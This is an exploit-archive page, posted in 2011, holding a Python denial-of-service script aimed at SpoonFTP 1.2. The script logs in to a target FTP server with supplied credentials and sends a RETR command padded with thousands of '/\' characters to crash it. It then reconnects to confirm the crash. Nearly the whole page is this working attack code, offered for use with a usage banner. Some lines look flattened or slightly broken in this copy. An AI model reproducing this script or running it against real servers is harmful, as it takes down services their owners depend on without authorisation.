Home / exploitsPDF  

SpoonFTP 1.2 Denial Of Service

Posted on 19 March 2011

#!/usr/bin/python # # #[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2 #[+]Date: 03182011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html #[+]Version: 1.2 #[+]Tested On: WIN-XP SP3 Portuguese Brazil #[+]CVE: N/A # # # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxxxx xxx xxx xxx xxx xxx xxx xxxxxx # xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx # xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx # xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx # #Criado por C4SS!0 G0M3S #E-mail Louredo_@hotmail.com #Site www.exploit-br.org # # from socket import * import os import sys from time import sleep if os.name == 'nt': os.system("cls") os.system("color 4f") else: os.system("clear") def usage(): print """ =================================================== =================================================== ==========Exploit Denial of Service SpoonFTP======= ==========Autor C4SS!0 G0M3S======================= ==========E-mail Louredo_@hotmail.com============== ==========Site www.exploit-br.org================== =================================================== =================================================== """ if len(sys.argv) !=5: usage() print " [-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0] print " [-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0] sys.exit(0) host = sys.argv[1] porta = int(sys.argv[2]) user = sys.argv[3] pasw = sys.argv[4] exploit = "/\" * (6000/3) usage() print " [+]Connecting to Server "+host+"... " sleep(1) s = socket(AF_INET,SOCK_STREAM) try: s.connect((host,porta)) print " [+]Checking if server is vulnerable " sleep(1) banner = s.recv(2000) if banner.find("SpoonFTP V1.2") == -1: print " [+]I'm sorry, server is not vulnerable:( " sleep(1) sys.exit(0x00) print " [+]Making Loging On Server " sleep(1) s.send("USER "+user+" ") s.recv(200) s.send("PASS "+pasw+" ") check = s.recv(2000) if check.find("230") == -1: print " [+]Error on Login, Check Your Username or Password " sleep(1) sys.exit(0) print " [+]Sending Exploit... " sleep(1) s.send("RETR "+exploit+" ") s.close() print " [+]Submitted Exploit Success " sleep(1) print " [+]Checking if the exploit works " sleep(1) try: so = socket(AF_INET,SOCK_STREAM) s.connect((host,porta)) print " [+]I'm Sorry, But Not Worked Exploit:( " sleep(1) except: print " [+]Congratulations, worked with the Exploit Success:) " sleep(1) except: print " [+]Error connecting to Server " sleep(1)

 

TOP